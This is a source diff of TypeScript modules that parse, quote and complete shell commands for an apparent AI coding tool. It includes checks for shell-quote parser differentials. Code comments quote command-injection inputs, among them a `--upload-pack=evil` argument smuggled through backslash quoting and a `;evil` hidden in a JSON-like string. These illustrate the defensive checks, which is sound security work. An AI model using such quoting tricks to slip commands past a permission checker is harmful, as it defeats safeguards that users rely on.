if (child.type === 'variable_assignment') continue
// Command name
if (
child.type === 'command_name' ||
(!foundCommandName && child.type === 'word')
) {
foundCommandName = true
args.push(child.text)
continue
}
// Arguments
if (ARGUMENT_TYPES.has(child.type)) {
args.push(stripQuotes(child.text))
} else if (SUBSTITUTION_TYPES.has(child.type)) {
break
}
}
return args
}
function stripQuotes(text: string): string {
return text.length >= 2 &&
((text[0] === '"' && text.at(-1) === '"') ||
(text[0] === "'" && text.at(-1) === "'"))
? text.slice(1, -1)
: text
}
+204
View File
@@ -0,0 +1,204 @@
import { buildPrefix } from '../shell/specPrefix.js'
import { splitCommand_DEPRECATED } from './commands.js'
import { extractCommandArguments, parseCommand } from './parser.js'
import { getCommandSpec } from './registry.js'
const NUMERIC = /^\d+$/
const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/
// Wrapper commands with complex option handling that can't be expressed in specs
const WRAPPER_COMMANDS = new Set([
'nice', // command position varies based on options
])
const toArray = <T>(val: T | T[]): T[] => (Array.isArray(val) ? val : [val])
// Check if args[0] matches a known subcommand (disambiguates wrapper commands
// that also have subcommands, e.g. the git spec has isCommand args for aliases).
function isKnownSubcommand(
arg: string,
spec: { subcommands?: { name: string | string[] }[] } | null,
): boolean {
if (!spec?.subcommands?.length) return false
return spec.subcommands.some(sub =>
Array.isArray(sub.name) ? sub.name.includes(arg) : sub.name === arg,
)
}
export async function getCommandPrefixStatic(
command: string,
recursionDepth = 0,
wrapperCount = 0,
): Promise<{ commandPrefix: string | null } | null> {
if (wrapperCount > 2 || recursionDepth > 10) return null
const parsed = await parseCommand(command)
if (!parsed) return null
if (!parsed.commandNode) {
return { commandPrefix: null }
}
const { envVars, commandNode } = parsed
const cmdArgs = extractCommandArguments(commandNode)
const [cmd, ...args] = cmdArgs
if (!cmd) return { commandPrefix: null }
// Check if this is a wrapper command by looking at its spec
const spec = await getCommandSpec(cmd)
// Check if this is a wrapper command
let isWrapper =
WRAPPER_COMMANDS.has(cmd) ||
(spec?.args && toArray(spec.args).some(arg => arg?.isCommand))
// Special case: if the command has subcommands and the first arg matches a subcommand,
// treat it as a regular command, not a wrapper
if (isWrapper && args[0] && isKnownSubcommand(args[0], spec)) {
isWrapper = false
}
const prefix = isWrapper
? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
: await buildPrefix(cmd, args, spec)
if (prefix === null && recursionDepth === 0 && isWrapper) {
return null
}
const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
return { commandPrefix: prefix ? envPrefix + prefix : null }
}
async function handleWrapper(
command: string,
args: string[],
recursionDepth: number,
wrapperCount: number,
): Promise<string | null> {
const spec = await getCommandSpec(command)
if (spec?.args) {
const commandArgIndex = toArray(spec.args).findIndex(arg => arg?.isCommand)
if (commandArgIndex !== -1) {
const parts = [command]
for (let i = 0; i < args.length && i <= commandArgIndex; i++) {
if (i === commandArgIndex) {
const result = await getCommandPrefixStatic(
args.slice(i).join(' '),
recursionDepth + 1,
wrapperCount + 1,
)
if (result?.commandPrefix) {
parts.push(...result.commandPrefix.split(' '))
return parts.join(' ')
}
break
} else if (
args[i] &&
!args[i]!.startsWith('-') &&
!ENV_VAR.test(args[i]!)
) {
parts.push(args[i]!)
}
}
}
}
const wrapped = args.find(
arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
)
if (!wrapped) return command
const result = await getCommandPrefixStatic(
args.slice(args.indexOf(wrapped)).join(' '),
recursionDepth + 1,
wrapperCount + 1,
)
return !result?.commandPrefix ? null : `${command} ${result.commandPrefix}`
}
/**
* Computes prefixes for a compound command (with && / || / ;).
* For single commands, returns a single-element array with the prefix.
*
* For compound commands, computes per-subcommand prefixes and collapses
* them: subcommands sharing a root (first word) are collapsed via
* word-aligned longest common prefix.
*
* @param excludeSubcommand — optional filter; return true for subcommands
* that should be excluded from the prefix suggestion (e.g. read-only
* commands that are already auto-allowed).
*/
export async function getCompoundCommandPrefixesStatic(
command: string,
excludeSubcommand?: (subcommand: string) => boolean,
): Promise<string[]> {
const subcommands = splitCommand_DEPRECATED(command)
if (subcommands.length <= 1) {
const result = await getCommandPrefixStatic(command)
return result?.commandPrefix ? [result.commandPrefix] : []
}
const prefixes: string[] = []
for (const subcmd of subcommands) {
const trimmed = subcmd.trim()
if (excludeSubcommand?.(trimmed)) continue
const result = await getCommandPrefixStatic(trimmed)
if (result?.commandPrefix) {
prefixes.push(result.commandPrefix)
}
}
if (prefixes.length === 0) return []
// Group prefixes by their first word (root command)
const groups = new Map<string, string[]>()
for (const prefix of prefixes) {
const root = prefix.split(' ')[0]!
const group = groups.get(root)
if (group) {
group.push(prefix)
} else {
groups.set(root, [prefix])
}
}
// Collapse each group via word-aligned LCP
const collapsed: string[] = []
for (const [, group] of groups) {
collapsed.push(longestCommonPrefix(group))
}
return collapsed
}
/**
* Compute the longest common prefix of strings, aligned to word boundaries.
* e.g. ["git fetch", "git worktree"] → "git"
* ["npm run test", "npm run lint"] → "npm run"
*/
function longestCommonPrefix(strings: string[]): string {
if (strings.length === 0) return ''
if (strings.length === 1) return strings[0]!
const first = strings[0]!
const words = first.split(' ')
let commonWords = words.length
for (let i = 1; i < strings.length; i++) {
const otherWords = strings[i]!.split(' ')
let shared = 0
while (
shared < commonWords &&
shared < otherWords.length &&
words[shared] === otherWords[shared]
) {
shared++
}
commonWords = shared
}
return words.slice(0, Math.max(1, commonWords)).join(' ')
}
+53
View File
@@ -0,0 +1,53 @@
import { memoizeWithLRU } from '../memoize.js'
import specs from './specs/index.js'
export type CommandSpec = {
name: string
description?: string
subcommands?: CommandSpec[]
args?: Argument | Argument[]
options?: Option[]
}
export type Argument = {
name?: string
description?: string
isDangerous?: boolean
isVariadic?: boolean // repeats infinitely e.g. echo hello world
isOptional?: boolean
isCommand?: boolean // wrapper commands e.g. timeout, sudo
isModule?: string | boolean // for python -m and similar module args
isScript?: boolean // script files e.g. node script.js
}
export type Option = {
name: string | string[]
description?: string
args?: Argument | Argument[]
isRequired?: boolean
}
export async function loadFigSpec(
command: string,
): Promise<CommandSpec | null> {
if (!command || command.includes('/') || command.includes('\\')) return null
if (command.includes('..')) return null
if (command.startsWith('-') && command !== '-') return null
try {
const module = await import(`@withfig/autocomplete/build/${command}.js`)
return module.default || module
} catch {
return null
}
}
export const getCommandSpec = memoizeWithLRU(
async (command: string): Promise<CommandSpec | null> => {
const spec =
specs.find(s => s.name === command) ||
(await loadFigSpec(command)) ||
null
return spec
},
(command: string) => command,
)
+259
View File
@@ -0,0 +1,259 @@
import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
import {
type ParseEntry,
quote,
tryParseShellCommand,
} from '../bash/shellQuote.js'
import { logForDebugging } from '../debug.js'
import { getShellType } from '../localInstaller.js'
import * as Shell from '../Shell.js'
// Constants
const MAX_SHELL_COMPLETIONS = 15
const SHELL_COMPLETION_TIMEOUT_MS = 1000
const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const
export type ShellCompletionType = 'command' | 'variable' | 'file'
type InputContext = {
prefix: string
completionType: ShellCompletionType
}
/**
* Check if a parsed token is a command operator (|, ||, &&, ;)
*/
function isCommandOperator(token: ParseEntry): boolean {
return (
typeof token === 'object' &&
token !== null &&
'op' in token &&
(COMMAND_OPERATORS as readonly string[]).includes(token.op as string)
)
}
/**
* Determine completion type based solely on prefix characteristics
*/
function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
if (prefix.startsWith('$')) {
return 'variable'
}
if (
prefix.includes('/') ||
prefix.startsWith('~') ||
prefix.startsWith('.')
) {
return 'file'
}
return 'command'
}
/**
* Find the last string token and its index in parsed tokens
*/
function findLastStringToken(
tokens: ParseEntry[],
): { token: string; index: number } | null {
const i = tokens.findLastIndex(t => typeof t === 'string')
return i !== -1 ? { token: tokens[i] as string, index: i } : null
}
/**
* Check if we're in a context that expects a new command
* (at start of input or after a command operator)
*/
function isNewCommandContext(
tokens: ParseEntry[],
currentTokenIndex: number,
): boolean {
if (currentTokenIndex === 0) {
return true
}
const prevToken = tokens[currentTokenIndex - 1]
return prevToken !== undefined && isCommandOperator(prevToken)
}
/**
* Parse input to extract completion context
*/
function parseInputContext(input: string, cursorOffset: number): InputContext {
const beforeCursor = input.slice(0, cursorOffset)
// Check if it's a variable prefix, before expanding with shell-quote
const varMatch = beforeCursor.match(/\$[a-zA-Z_][a-zA-Z0-9_]*$/)
if (varMatch) {
return { prefix: varMatch[0], completionType: 'variable' }
}
// Parse with shell-quote
const parseResult = tryParseShellCommand(beforeCursor)
if (!parseResult.success) {
// Fallback to simple parsing
const tokens = beforeCursor.split(/\s+/)
const prefix = tokens[tokens.length - 1] || ''
const isFirstToken = tokens.length === 1 && !beforeCursor.includes(' ')
const completionType = isFirstToken
? 'command'
: getCompletionTypeFromPrefix(prefix)
return { prefix, completionType }
}
// Extract current token
const lastToken = findLastStringToken(parseResult.tokens)
if (!lastToken) {
// No string token found - check if after operator
const lastParsedToken = parseResult.tokens[parseResult.tokens.length - 1]
const completionType =
lastParsedToken && isCommandOperator(lastParsedToken)
? 'command'
: 'command' // Default to command at start
return { prefix: '', completionType }
}
// If there's a trailing space, the user is starting a new argument
if (beforeCursor.endsWith(' ')) {
// After first token (command) with space = file argument expected
return { prefix: '', completionType: 'file' }
}
// Determine completion type from context
const baseType = getCompletionTypeFromPrefix(lastToken.token)
// If it's clearly a file or variable based on prefix, use that type
if (baseType === 'variable' || baseType === 'file') {
return { prefix: lastToken.token, completionType: baseType }
}
// For command-like tokens, check context: are we starting a new command?
const completionType = isNewCommandContext(
parseResult.tokens,
lastToken.index,
)
? 'command'
: 'file' // Not after operator = file argument
return { prefix: lastToken.token, completionType }
}
/**
* Generate bash completion command using compgen
*/
function getBashCompletionCommand(
prefix: string,
completionType: ShellCompletionType,
): string {
if (completionType === 'variable') {
// Variable completion - remove $ prefix
const varName = prefix.slice(1)
return `compgen -v ${quote([varName])} 2>/dev/null`
} else if (completionType === 'file') {
// File completion with trailing slash for directories and trailing space for files
// Use 'while read' to prevent command injection from filenames containing newlines
return `compgen -f ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
} else {
// Command completion
return `compgen -c ${quote([prefix])} 2>/dev/null`
}
}
/**
* Generate zsh completion command using native zsh commands
*/
function getZshCompletionCommand(
prefix: string,
completionType: ShellCompletionType,
): string {
if (completionType === 'variable') {
// Variable completion - use zsh pattern matching for safe filtering
const varName = prefix.slice(1)
return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
} else if (completionType === 'file') {
// File completion with trailing slash for directories and trailing space for files
// Note: zsh glob expansion is safe from command injection (unlike bash for-in loops)
return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
} else {
// Command completion - use zsh pattern matching for safe filtering
return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
}
}
/**
* Get completions for the given shell type
*/
async function getCompletionsForShell(
shellType: 'bash' | 'zsh',
prefix: string,
completionType: ShellCompletionType,
abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
let command: string
if (shellType === 'bash') {
command = getBashCompletionCommand(prefix, completionType)
} else if (shellType === 'zsh') {
command = getZshCompletionCommand(prefix, completionType)
} else {
// Unsupported shell type
return []
}
const shellCommand = await Shell.exec(command, abortSignal, 'bash', {
timeout: SHELL_COMPLETION_TIMEOUT_MS,
})
const result = await shellCommand.result
return result.stdout
.split('\n')
.filter((line: string) => line.trim())
.slice(0, MAX_SHELL_COMPLETIONS)
.map((text: string) => ({
id: text,
displayText: text,
description: undefined,
metadata: { completionType },
}))
}
/**
* Get shell completions for the given input
* Supports bash and zsh shells (matches Shell.ts execution support)
*/
export async function getShellCompletions(
input: string,
cursorOffset: number,
abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
const shellType = getShellType()
// Only support bash/zsh (matches Shell.ts execution support)
if (shellType !== 'bash' && shellType !== 'zsh') {
return []
}
try {
const { prefix, completionType } = parseInputContext(input, cursorOffset)
if (!prefix) {
return []
}
const completions = await getCompletionsForShell(
shellType,
prefix,
completionType,
abortSignal,
)
// Add inputSnapshot to all suggestions so we can detect when input changes
return completions.map(suggestion => ({
...suggestion,
metadata: {
...(suggestion.metadata as { completionType: ShellCompletionType }),
inputSnapshot: input,
},
}))
} catch (error) {
logForDebugging(`Shell completion failed: ${error}`)
return [] // Silent fail
}
}
+28
View File
@@ -0,0 +1,28 @@
import { quote } from './shellQuote.js'
/**
* Parses a shell prefix that may contain an executable path and arguments.
*
* Examples:
* - "bash" -> quotes as 'bash'
* - "/usr/bin/bash -c" -> quotes as '/usr/bin/bash' -c
* - "C:\Program Files\Git\bin\bash.exe -c" -> quotes as 'C:\Program Files\Git\bin\bash.exe' -c
*
* @param prefix The shell prefix string containing executable and optional arguments
* @param command The command to be executed
* @returns The properly formatted command string with quoted components
*/
export function formatShellPrefixCommand(
prefix: string,
command: string,
): string {
// Split on the last space before a dash to separate executable from arguments
const spaceBeforeDash = prefix.lastIndexOf(' -')
if (spaceBeforeDash > 0) {
const execPath = prefix.substring(0, spaceBeforeDash)
const args = prefix.substring(spaceBeforeDash + 1)
return `${quote([execPath])} ${args} ${quote([command])}`
} else {
return `${quote([prefix])} ${quote([command])}`
}
}
+304
View File
@@ -0,0 +1,304 @@
/**
* Safe wrappers for shell-quote library functions that handle errors gracefully
* These are drop-in replacements for the original functions
*/
import {
type ParseEntry,
parse as shellQuoteParse,
quote as shellQuoteQuote,
} from 'shell-quote'
import { logError } from '../log.js'
import { jsonStringify } from '../slowOperations.js'
export type { ParseEntry } from 'shell-quote'
export type ShellParseResult =
| { success: true; tokens: ParseEntry[] }
| { success: false; error: string }
export type ShellQuoteResult =
| { success: true; quoted: string }
| { success: false; error: string }
export function tryParseShellCommand(
cmd: string,
env?:
| Record<string, string | undefined>
| ((key: string) => string | undefined),
): ShellParseResult {
try {
const tokens =
typeof env === 'function'
? shellQuoteParse(cmd, env)
: shellQuoteParse(cmd, env)
return { success: true, tokens }
} catch (error) {
if (error instanceof Error) {
logError(error)
}
return {
success: false,
error: error instanceof Error ? error.message : 'Unknown parse error',
}
}
}
export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
try {
const validated: string[] = args.map((arg, index) => {
if (arg === null || arg === undefined) {
return String(arg)
}
const type = typeof arg
if (type === 'string') {
return arg as string
}
if (type === 'number' || type === 'boolean') {
return String(arg)
}
if (type === 'object') {
throw new Error(
`Cannot quote argument at index ${index}: object values are not supported`,
)
}
if (type === 'symbol') {
throw new Error(
`Cannot quote argument at index ${index}: symbol values are not supported`,
)
}
if (type === 'function') {
throw new Error(
`Cannot quote argument at index ${index}: function values are not supported`,
)
}
throw new Error(
`Cannot quote argument at index ${index}: unsupported type ${type}`,
)
})
const quoted = shellQuoteQuote(validated)
return { success: true, quoted }
} catch (error) {
if (error instanceof Error) {
logError(error)
}
return {
success: false,
error: error instanceof Error ? error.message : 'Unknown quote error',
}
}
}
/**
* Checks if parsed tokens contain malformed entries that suggest shell-quote
* misinterpreted the command. This happens when input contains ambiguous
* patterns (like JSON-like strings with semicolons) that shell-quote parses
* according to shell rules, producing token fragments.
*
* For example, `echo {"hi":"hi;evil"}` gets parsed with `;` as an operator,
* producing tokens like `{hi:"hi` (unbalanced brace). Legitimate commands
* produce complete, balanced tokens.
*
* Also detects unterminated quotes in the original command: shell-quote
* silently drops an unmatched `"` or `'` and parses the rest as unquoted,
* leaving no trace in the tokens. `echo "hi;evil | cat` (one unmatched `"`)
* is a bash syntax error, but shell-quote yields clean tokens with `;` as
* an operator. The token-level checks below can't catch this, so we walk
* the original command with bash quote semantics and flag odd parity.
*
* Security: This prevents command injection via HackerOne #3482049 where
* shell-quote's correct parsing of ambiguous input can be exploited.
*/
export function hasMalformedTokens(
command: string,
parsed: ParseEntry[],
): boolean {
// Check for unterminated quotes in the original command. shell-quote drops
// an unmatched quote without leaving any trace in the tokens, so this must
// inspect the raw string. Walk with bash semantics: backslash escapes the
// next char outside single-quotes; no escapes inside single-quotes.
let inSingle = false
let inDouble = false
let doubleCount = 0
let singleCount = 0
for (let i = 0; i < command.length; i++) {
const c = command[i]
if (c === '\\' && !inSingle) {
i++
continue
}
if (c === '"' && !inSingle) {
doubleCount++
inDouble = !inDouble
} else if (c === "'" && !inDouble) {
singleCount++
inSingle = !inSingle
}
}
if (doubleCount % 2 !== 0 || singleCount % 2 !== 0) return true
for (const entry of parsed) {
if (typeof entry !== 'string') continue
// Check for unbalanced curly braces
const openBraces = (entry.match(/{/g) || []).length
const closeBraces = (entry.match(/}/g) || []).length
if (openBraces !== closeBraces) return true
// Check for unbalanced parentheses
const openParens = (entry.match(/\(/g) || []).length
const closeParens = (entry.match(/\)/g) || []).length
if (openParens !== closeParens) return true
// Check for unbalanced square brackets
const openBrackets = (entry.match(/\[/g) || []).length
const closeBrackets = (entry.match(/\]/g) || []).length
if (openBrackets !== closeBrackets) return true
// Check for unbalanced double quotes
// Count quotes that aren't escaped (preceded by backslash)
// A token with an odd number of unescaped quotes is malformed
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
const doubleQuotes = entry.match(/(?<!\\)"/g) || []
if (doubleQuotes.length % 2 !== 0) return true
// Check for unbalanced single quotes
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
const singleQuotes = entry.match(/(?<!\\)'/g) || []
if (singleQuotes.length % 2 !== 0) return true
}
return false
}
/**
* Detects commands containing '\' patterns that exploit the shell-quote library's
* incorrect handling of backslashes inside single quotes.
*
* In bash, single quotes preserve ALL characters literally - backslash has no
* special meaning. So '\' is just the string \ (the quote opens, contains \,
* and the next ' closes it). But shell-quote incorrectly treats \ as an escape
* character inside single quotes, causing '\' to NOT close the quoted string.
*
* This means the pattern '\' <payload> '\' hides <payload> from security checks
* because shell-quote thinks it's all one single-quoted string.
*/
export function hasShellQuoteSingleQuoteBug(command: string): boolean {
// Walk the command with correct bash single-quote semantics
let inSingleQuote = false
let inDoubleQuote = false
for (let i = 0; i < command.length; i++) {
const char = command[i]
// Handle backslash escaping outside of single quotes
if (char === '\\' && !inSingleQuote) {
// Skip the next character (it's escaped)
i++
continue
}
if (char === '"' && !inSingleQuote) {
inDoubleQuote = !inDoubleQuote
continue
}
if (char === "'" && !inDoubleQuote) {
inSingleQuote = !inSingleQuote
// Check if we just closed a single quote and the content ends with
// trailing backslashes. shell-quote's chunker regex '((\\'|[^'])*?)'
// incorrectly treats \' as an escape sequence inside single quotes,
// while bash treats backslash as literal. This creates a differential
// where shell-quote merges tokens that bash treats as separate.
//
// Odd trailing \'s = always a bug:
// '\' -> shell-quote: \' = literal ', still open. bash: \, closed.
// 'abc\' -> shell-quote: abc then \' = literal ', still open. bash: abc\, closed.
// '\\\' -> shell-quote: \\ + \', still open. bash: \\\, closed.
//
// Even trailing \'s = bug ONLY when a later ' exists in the command:
// '\\' alone -> shell-quote backtracks, both parsers agree string closes. OK.
// '\\' 'next' -> shell-quote: \' consumes the closing ', finds next ' as
// false close, merges tokens. bash: two separate tokens.
//
// Detail: the regex alternation tries \' before [^']. For '\\', it matches
// the first \ via [^'] (next char is \, not '), then the second \ via \'
// (next char IS '). This consumes the closing '. The regex continues reading
// until it finds another ' to close the match. If none exists, it backtracks
// to [^'] for the second \ and closes correctly. If a later ' exists (e.g.,
// the opener of the next single-quoted arg), no backtracking occurs and
// tokens merge. See H1 report: git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
// shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
// bash: ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
if (!inSingleQuote) {
let backslashCount = 0
let j = i - 1
while (j >= 0 && command[j] === '\\') {
backslashCount++
j--
}
if (backslashCount > 0 && backslashCount % 2 === 1) {
return true
}
// Even trailing backslashes: only a bug when a later ' exists that
// the chunker regex can use as a false closing quote. We check for
// ANY later ' because the regex doesn't respect bash quote state
// (e.g., a ' inside double quotes is also consumable).
if (
backslashCount > 0 &&
backslashCount % 2 === 0 &&
command.indexOf("'", i + 1) !== -1
) {
return true
}
}
continue
}
}
return false
}
export function quote(args: ReadonlyArray<unknown>): string {
// First try the strict validation
const result = tryQuoteShellArgs([...args])
if (result.success) {
return result.quoted
}
// If strict validation failed, use lenient fallback
// This handles objects, symbols, functions, etc. by converting them to strings
try {
const stringArgs = args.map(arg => {
if (arg === null || arg === undefined) {
return String(arg)
}
const type = typeof arg
if (type === 'string' || type === 'number' || type === 'boolean') {
return String(arg)
}
// For unsupported types, use JSON.stringify as a safe fallback
// This ensures we don't crash but still get a meaningful representation
return jsonStringify(arg)
})
return shellQuoteQuote(stringArgs)
} catch (error) {
// SECURITY: Never use JSON.stringify as a fallback for shell quoting.
// JSON.stringify uses double quotes which don't prevent shell command execution.
// For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
if (error instanceof Error) {
logError(error)
}
throw new Error('Failed to quote shell arguments safely')
}
}
+128
View File
@@ -0,0 +1,128 @@
import { quote } from './shellQuote.js'
/**
* Detects if a command contains a heredoc pattern
* Matches patterns like: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF, etc.
*/
function containsHeredoc(command: string): boolean {
// Match heredoc patterns: << followed by optional -, then optional quotes or backslash, then word
// Matches: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF
// Check for bit-shift operators first and exclude them
if (
/\d\s*<<\s*\d/.test(command) ||
/\[\[\s*\d+\s*<<\s*\d+\s*\]\]/.test(command) ||
/\$\(\(.*<<.*\)\)/.test(command)
) {
return false
}
// Now check for heredoc patterns
const heredocRegex = /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/
return heredocRegex.test(command)
}
/**
* Detects if a command contains multiline strings in quotes
*/
function containsMultilineString(command: string): boolean {
// Check for strings with actual newlines in them
// Handle escaped quotes by using a more sophisticated pattern
// Match single quotes: '...\n...' where content can include escaped quotes \'
// Match double quotes: "...\n..." where content can include escaped quotes \"
const singleQuoteMultiline = /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/
const doubleQuoteMultiline = /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/
return (
singleQuoteMultiline.test(command) || doubleQuoteMultiline.test(command)
)
}
/**
* Quotes a shell command appropriately, preserving heredocs and multiline strings
* @param command The command to quote
* @param addStdinRedirect Whether to add < /dev/null
* @returns The properly quoted command
*/
export function quoteShellCommand(
command: string,
addStdinRedirect: boolean = true,
): string {
// If command contains heredoc or multiline strings, handle specially
// The shell-quote library incorrectly escapes ! to \! in these cases
if (containsHeredoc(command) || containsMultilineString(command)) {
// For heredocs and multiline strings, we need to quote for eval
// but avoid shell-quote's aggressive escaping
// We'll use single quotes and escape only single quotes in the command
const escaped = command.replace(/'/g, "'\"'\"'")
const quoted = `'${escaped}'`
// Don't add stdin redirect for heredocs as they provide their own input
if (containsHeredoc(command)) {
return quoted
}
// For multiline strings without heredocs, add stdin redirect if needed
return addStdinRedirect ? `${quoted} < /dev/null` : quoted
}
// For regular commands, use shell-quote
if (addStdinRedirect) {
return quote([command, '<', '/dev/null'])
}
return quote([command])
}
/**
* Detects if a command already has a stdin redirect
* Match patterns like: < file, </path/to/file, < /dev/null, etc.
* But not <<EOF (heredoc), << (bit shift), or <(process substitution)
*/
export function hasStdinRedirect(command: string): boolean {
// Look for < followed by whitespace and a filename/path
// Negative lookahead to exclude: <<, <(
// Must be preceded by whitespace or command separator or start of string
return /(?:^|[\s;&|])<(?![<(])\s*\S+/.test(command)
}
/**
* Checks if stdin redirect should be added to a command
* @param command The command to check
* @returns true if stdin redirect can be safely added
*/
export function shouldAddStdinRedirect(command: string): boolean {
// Don't add stdin redirect for heredocs as it interferes with the heredoc terminator
if (containsHeredoc(command)) {
return false
}
// Don't add stdin redirect if command already has one
if (hasStdinRedirect(command)) {
return false
}
// For other commands, stdin redirect is generally safe
return true
}
/**
* Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
*
* The model occasionally hallucinates Windows CMD syntax (e.g., `ls 2>nul`)
* even though our bash shell is always POSIX (Git Bash / WSL on Windows).
* When Git Bash sees `2>nul`, it creates a literal file named `nul` — a
* Windows reserved device name that is extremely hard to delete and breaks
* `git add .` and `git clone`. See anthropics/claude-code#4928.
*
* Matches: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (case-insensitive)
* Does NOT match: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`
*
* Limitation: this regex does not parse shell quoting, so `echo ">nul"`
* will also be rewritten. This is acceptable collateral — it's extremely
* rare and rewriting to `/dev/null` inside a string is harmless.
*/
const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g
export function rewriteWindowsNullRedirect(command: string): string {
return command.replace(NUL_REDIRECT_REGEX, '$1/dev/null')
}
+14
View File
@@ -0,0 +1,14 @@
import type { CommandSpec } from '../registry.js'
const alias: CommandSpec = {
name: 'alias',
description: 'Create or list command aliases',
args: {
name: 'definition',
description: 'Alias definition in the form name=value',
isOptional: true,
isVariadic: true,
},
}
export default alias
+18
View File
@@ -0,0 +1,18 @@
import type { CommandSpec } from '../registry.js'
import alias from './alias.js'
import nohup from './nohup.js'
import pyright from './pyright.js'
import sleep from './sleep.js'
import srun from './srun.js'
import time from './time.js'
import timeout from './timeout.js'
export default [
pyright,
timeout,
sleep,
alias,
nohup,
time,
srun,
] satisfies CommandSpec[]
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
const nohup: CommandSpec = {
name: 'nohup',
description: 'Run a command immune to hangups',
args: {
name: 'command',
description: 'Command to run with nohup',
isCommand: true,
},
}
export default nohup
+91
View File
@@ -0,0 +1,91 @@
import type { CommandSpec } from '../registry.js'
export default {
name: 'pyright',
description: 'Type checker for Python',
options: [
{ name: ['--help', '-h'], description: 'Show help message' },
{ name: '--version', description: 'Print pyright version and exit' },
{
name: ['--watch', '-w'],
description: 'Continue to run and watch for changes',
},
{
name: ['--project', '-p'],
description: 'Use the configuration file at this location',
args: { name: 'FILE OR DIRECTORY' },
},
{ name: '-', description: 'Read file or directory list from stdin' },
{
name: '--createstub',
description: 'Create type stub file(s) for import',
args: { name: 'IMPORT' },
},
{
name: ['--typeshedpath', '-t'],
description: 'Use typeshed type stubs at this location',
args: { name: 'DIRECTORY' },
},
{
name: '--verifytypes',
description: 'Verify completeness of types in py.typed package',
args: { name: 'IMPORT' },
},
{
name: '--ignoreexternal',
description: 'Ignore external imports for --verifytypes',
},
{
name: '--pythonpath',
description: 'Path to the Python interpreter',
args: { name: 'FILE' },
},
{
name: '--pythonplatform',
description: 'Analyze for platform',
args: { name: 'PLATFORM' },
},
{
name: '--pythonversion',
description: 'Analyze for Python version',
args: { name: 'VERSION' },
},
{
name: ['--venvpath', '-v'],
description: 'Directory that contains virtual environments',
args: { name: 'DIRECTORY' },
},
{ name: '--outputjson', description: 'Output results in JSON format' },
{ name: '--verbose', description: 'Emit verbose diagnostics' },
{ name: '--stats', description: 'Print detailed performance stats' },
{
name: '--dependencies',
description: 'Emit import dependency information',
},
{
name: '--level',
description: 'Minimum diagnostic level',
args: { name: 'LEVEL' },
},
{
name: '--skipunannotated',
description: 'Skip type analysis of unannotated functions',
},
{
name: '--warnings',
description: 'Use exit code of 1 if warnings are reported',
},
{
name: '--threads',
description: 'Use up to N threads to parallelize type checking',
args: { name: 'N', isOptional: true },
},
],
args: {
name: 'files',
description:
'Specify files or directories to analyze (overrides config file)',
isVariadic: true,
isOptional: true,
},
} satisfies CommandSpec
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
const sleep: CommandSpec = {
name: 'sleep',
description: 'Delay for a specified amount of time',
args: {
name: 'duration',
description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
isOptional: false,
},
}
export default sleep
+31
View File
@@ -0,0 +1,31 @@
import type { CommandSpec } from '../registry.js'
const srun: CommandSpec = {
name: 'srun',
description: 'Run a command on SLURM cluster nodes',
options: [
{
name: ['-n', '--ntasks'],
description: 'Number of tasks',
args: {
name: 'count',
description: 'Number of tasks to run',
},
},
{
name: ['-N', '--nodes'],
description: 'Number of nodes',
args: {
name: 'count',
description: 'Number of nodes to allocate',
},
},
],
args: {
name: 'command',
description: 'Command to run on the cluster',
isCommand: true,
},
}
export default srun
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
const time: CommandSpec = {
name: 'time',
description: 'Time a command',
args: {
name: 'command',
description: 'Command to time',
isCommand: true,
},
}
export default time
+20
View File
@@ -0,0 +1,20 @@
import type { CommandSpec } from '../registry.js'
const timeout: CommandSpec = {
name: 'timeout',
description: 'Run a command with a time limit',
args: [
{
name: 'duration',
description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
isOptional: false,
},
{
name: 'command',
description: 'Command to run',
isCommand: true,
},
],
}
export default timeout
+506
View File
@@ -0,0 +1,506 @@
/**
* Tree-sitter AST analysis utilities for bash command security validation.
*
* These functions extract security-relevant information from tree-sitter
* parse trees, providing more accurate analysis than regex/shell-quote
* parsing. Each function takes a root node and command string, and returns
* structured data that can be used by security validators.
*
* The native NAPI parser returns plain JS objects — no cleanup needed.
*/
type TreeSitterNode = {
type: string
text: string
startIndex: number
endIndex: number
children: TreeSitterNode[]
childCount: number
}
export type QuoteContext = {
/** Command text with single-quoted content removed (double-quoted content preserved) */
withDoubleQuotes: string
